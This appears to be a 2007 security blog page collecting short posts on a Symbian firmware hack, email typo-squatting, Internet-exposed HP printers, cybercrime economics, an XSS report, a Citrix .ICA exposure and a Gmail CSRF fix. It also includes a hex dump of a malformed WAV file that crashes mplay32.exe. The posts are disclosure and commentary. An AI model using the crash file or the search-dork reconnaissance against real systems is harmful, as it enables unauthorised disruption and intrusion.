A blog called Symbaali.info has released information about hacking of S60 3rd edition firmware with Flash update.
According to the blog a new Nokia Software Updater prevents this Symbian hack from working.

It appears that the point in this case is the editing of swipolicy.ini file.

By adding AllFiles capability to the file it’s possible to explore the entire file system.

The author has released several screenshots confirming the access to the Sys folder too.

The previous entries released earlier this month are located at symbaali.info/2007_10_01_archive.html.The site is registered to Mr. Roger Muhmu using a contact address of local Peekpoke company. Their Web site lists a P.O. Box address in Jyväskylä, Finland.

Security professionals here in Finland have confirmed the issue and Nokia’s Corporate Security department is aware. The following devices have been verified: Nokia N73, E61 and E90.

Ron Liechty of Forum Nokia confirmed the issue on Monday 29th Oct.

You all remember cybersquatting, a popular sport in the late 90s, right?
McDonalds.com, JenniferLopez.com, Hertz.com and Avon.com thankfully all point to the right web sites today, but thaiairline.com, mcdonald.com, luftansa.com, gugle.com, barnesandnobles.com and other misspellings are fake web sites intended to trap the casual surfer with a hand that’s a bit too much quicker than the eye.

These web site traps are successful because web sites are so easy to remember, people don’t bother bookmarking them. It used to be that if you wanted to know the weather in Minnesota you had to go to http://www.geocities.com/Athens/rubytuesday71/weatherinminnesota281007.html . Today you go to weather.com (or type “weather for Minnesota” in google) and get an immediate response.
If you want to go to the McDonalds web site, you don’t even spend the 10 seconds to look it up – you will type McDonalds.com and expect to see the latest dollar meal menu.
But the same is true for the other popular form of communication – email. If I know the person’s name and company (or free email system) I will generally just type it up rather than look it up on my address book.
Of course, back in the hotmail days when John was john_sm1th253@hotmail.com I couldn’t rely on my memory alone. But today, if your name isn’t John Smith, it’s probably not too difficult to get a decent first name/last name combination on gmail, yahoo or some other free mail system, and certainly on your corporate email system.

So will we start seeing cyber-squatting on email addresses? Maybe we already do. There is no real way to know who’s behind a certain email address and while it’s merely funny if a guy names Roo Taylor gets the email root@aol.com, it could actually be dangerous if some bad guy owns john@gmail.com, johnsmith@gmail.com, johns@gmail.com, etc. Imagine how much legitimate mail is accidentally sent to those accounts by people who send the latest budget figures to their boss at work and also CC his personal address so he can watch it from his home machine too.

I have first-hand experience of this ‘attack’. Luckily for me I’ve got the login to aviram@gmail.com (piece of cake. All you need is to have a “google-in-law”. For me it was as simple as my office neighbor’s wife having a cousin that works for google. Then they sign you up for a new experimental beta google product called “google mail” and you get not only to pick your first name as login, but send invites to a bunch of envying friends). As gmail becomes more popular I’m receiving invitation to birthday parties of people I don’t know, detailed minutes of brainstorming meetings I’ve never been to and last week a bunch of emails with the list of hospital equipment and inventory, all sent to some other ‘aviram’. I can’t imagine what would have happened if my first name was more common. I’m also pretty sure it’s still possible to register gmail accounts with common misspellings and dig out some of the emails that come out.

At the very least, this would give the bad guys get a fresh harvest of active email addresses. But if they’re lucky, they may receive an email that carries a personal story that can be exploited further. Think about a young guy sending his parents pictures from an Internet cafe about his Africa safari trip. A simple typo sends the email to our bad guy who then forges a follow-up email to the parents telling them his wallet was stolen and that they need to wire money to help their stranded son.

Cybersquatting is easy to identify and is usually settled in court. With “email-squatting” I don’t see a clear and obvious solution; in the meanwhile, be sure to only use your address book…

I have noticed that a few people have been careless enough to leave their HP LaserJet (maybe others are also relevant) HTTP interface open to the Internet. Even though most of the functionality is disabled, you can still screw around with it by asking it to print the font list, which isn’t a total waste of paper unless you do this repeativily until the printer runs out of paper.

I would recommend NOT allowing your printers to be visible from the Internet.

(BTW: I found 20 such devices open, but I guess a better Google query could find more)

Memory Leak strip #23 is devoted for all of you, gadget lovers, out there.

(Thanks to the Z.Z. for the idea)

Click on the image for full size.

Anywhere that you have connectivity combined with the absence of a functioning judicial system; you will breed crime. It doesn’t matter what that connectivity is, or how you measure that connectivity - whether it is in paved roads, running water, electricity - each of these factors contributes to both the reach of commerce and the reach of criminals. The two cannot be divorced from each other. If you have a rapid expansion of transportation, without an equal expansion of police power, criminals will exploit that weakness. In the wild west, outlaws would rob trains as they crossed the nation, knowing that they’d be vulnerable and there was little chance of being caught (as it happens, the development of the telegraph put an end to train robberies.)

Let’s look at Russia. Back in the cold war era, there were technology export restrictions in place. With the fall of the Iron Curtain, those restrictions were relaxed. By the time we in the United States started going online en-masse in 1995, upgrading our computer systems to Pentium machines running Windows 95 - our old computer systems didn’t go into the garbage, they were sold into the huge technological vacuum of the former Soviet Union.

Who are the early adopters of technology? Kids of course! And Russia was no exception. Like a 16-year-old with a hot rod, the youths started souping up computers that we considered garbage. They got on to the internet using whatever they could, and once they connected to our information flows, they started teaching themselves programming. Because they were learning to program on outdated equipment, this forced them to become very, very good. There was no such thing as code bloat. Then you add 5 years to the calendar and what do you have? Little Ivan is no longer 15, he is 20 and has 5 years experience - and therein lies the rub - Ivan cannot go out and get a job in information technology, there is no economy to support his skill set. So, he goes about earning a living any way he can. I call it “N0 RUL3Z, JU5T WR1T3″. Ivan sets about writing spam software, creating Trojan horses, worms… this is where we see the emergence of the botnet.

Brazil wasn’t far behind. In 2004-2005 we saw an uptick in the botnet wars arms race with Russia being one-upped by Brazil with the Beagle/Bagle, Mydoom and Sasser botnet pissing contest.

There is a tide shift taking place. Putin has implemented a 12% flat tax which is bringing revenues flowing into the Russian economy for the first time in 15 years. They are reviving their legal system because they want to attract the Foreign Direct Investment dollars which will never come if they have no legal system which can enforce a legal contract. Along with the civil justice and FDI dollars, criminal justice must reign in corruption otherwise the FDI dollars will quickly disappear. So, Russia is growing out of the script kiddie phase and reemerging onto the world scene. Its good to have Mother Russia back (New & Improved, Now with 1337 H4×0rs!).

I could go on providing details of history and economics, but I will leave that for later. But I will pose this question for you to think about: What do you think the outcome of One Laptop Per Child will have on the future of cybercrime? If connectivity absent a legal system is the breeding ground for crime, what do you think will happen as the bottom billion in Africa gets online?

Computer security is all about dealing with the unintended consequences. Every computer and every system that was ever built was first done to share information, not secure it. Security only came after we got everything connected, then had the collective “awww crap!” moment.

I see another one of those moments coming up on the horizon. Do you? I’m interested in hearing your comments on what the future has in store for security.

This is a bit pointless, as I’m blogging about a “controversy” that has already been settled. I do think there are useful tools to take from this incident, though.

For those out of the loop, a few days ago players of online poker site “Absolute Poker” (no link, deal with it) accused a player called “POTRIPPER” of playing while being able to see the hole cards. I’ll save the poker laymen’s task of trying to figure out what that means (as I had to) - in that variant of poker some of the cards are shown, while others are hidden. People were accusing POTRIPPER that (s)he was playing while being able to see everyone’s hidden cards.

I should point out that this is a settled controversy. Absolute Poker admitted that this is the work of an internal security breach. I am less interested in the specific case, however, than I am in looking at tools designed to answer the “how can we know” question. (more…)

Netscape Navigator 9 has been released recently. The previous Netscape Browser 8.1 was released in April and it was Windows-only version. It is worth of noticing that the latest version is not Netscape Browser 9 or Netscape 9 - it’s Netscape Navigator 9.

The new version was released at browser.netscape.com/downloads/.

It appears that an official Security Alert page is not available, but Release Notes document and the UA string confirm that the new version is based to Mozilla Firefox 2.0.0.7 codebase.

The latest fixed vulnerability in Firefox is this QuickTime issue (CVE-2006-4965). The Gecko level of previous version (Netscape 8.1.3) was Gecko rv 1.7.5 (20070321), in turn.

The typical WinXP User Agent is the following: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.8pre) Gecko/20071015 Firefox/2.0.0.7 Navigator/9.0

In August we saw a cross-domain injection type XSS report from CLPWN related to Cnn.com.

The target was Search.cnn.com.

This week, Xssed.com reports about the new issue.

According to the ‘Additional information’ field of the report

XSS in the “Get your local weather and news” form

No exact string was given.

Additionally, the Xssed database lists the issue as Unfixed.

The debate about the term “zero days” is not directly related to this PCM vulnerability I am about to reveal, but as this vulnerability is not publicly documented, as far as I know, I will call it a 0day.

The vulnerability allows you to crash the mplay32.exe - that for some reason is still shipped with Windows up to version 2003, maybe also Vista, can someone confirm? - this low-quality and feature-lacking (software-wise) player contains a problem where a malformed PCM file can cause it to crash as it tries to divide one number by zero.
00000000 52 49 46 46 24 00 00 1a 57 41 56 45 66 6d 74 20
|RIFF$…WAVEfmt |
00000010 10 00 00 00 01 00 02 00 44 ac 00 00 88 58 01 00
|……..D….X..|
00000020 00 00 10 00 64 61 74 61 00 00 00 1a 00 00 24 17
|….data……$.|
00000030 1e f3 3c 13 3c 14 16 f9 18 f9 34 e7 23 a6 3c f2
|..< .<.....4.#.<.|
00000040 24 f2 11 ce 1a 0d
|$.....|
Is this vulnerability interesting? not really - mplay32.exe is no longer the default player - unless you are still in the stone-age (i.e. have never upgraded your system or Internet Explorer) - and it allows you to do nothing but crash the player.

If someone can find out more about this issue, I will be happy to hear.

BTW: This PCM vulnerability was discovered by beSTORM’s PCM (WAV) fuzzing module - which was launched against mplay32.exe

Mr. Petko D. ‘Acrobat-Gmail’ Petkov has reported about very interesting Citrix issue:

When querying for public .ICA files (Independent Computing Architecture) you can do serious things in the remote system with this information. Opening Cmd.exe and listing the file system works etc. etc.

Report here and YouTube video of 1:28min here.
Googledork and Yahoodork(!) included, it appears there are many .mil and .gov sites. And hospitals too.
A real life example: A Finnish high school in Jyväskylä town fixed its problem in less than 20 minutes after receiving my e-mail this morning. Fine!

The good news are that Google has fixed a serious cross-site request forgery vulnerability in Gmail.

The exploitation technique was interesting - modifying Gmail’s Forwarding settings with JavaScript.

US-CERT Vulnerability Note VU#571584 is located here.

if there’s anyone out there who wants to take down securiteam blogs once and for all, here’s your chance.
on thursday Sunshine, noam and i will be on the same airplane flying to trsec in istanbul. in case of an airplane crash, the root password will be lost forever and save for the daily post from juha-matti the blogs will go dark with no one else writing (yes fellow securiteam bloggers, i *am* looking at you).

anyway, if you’re in the area, istanbul is a great place to visit this time of year. mail us for an invitation (we’ve got a bunch of “securiteam” tickets reserved) and come by on friday to profilo al��veri� merkezi to say hello and we’ll buy you a beer^h^h^h^h coke (turkey is a muslim country).

Insecurity, strip #15 of this new comics.

Click on the image for full size.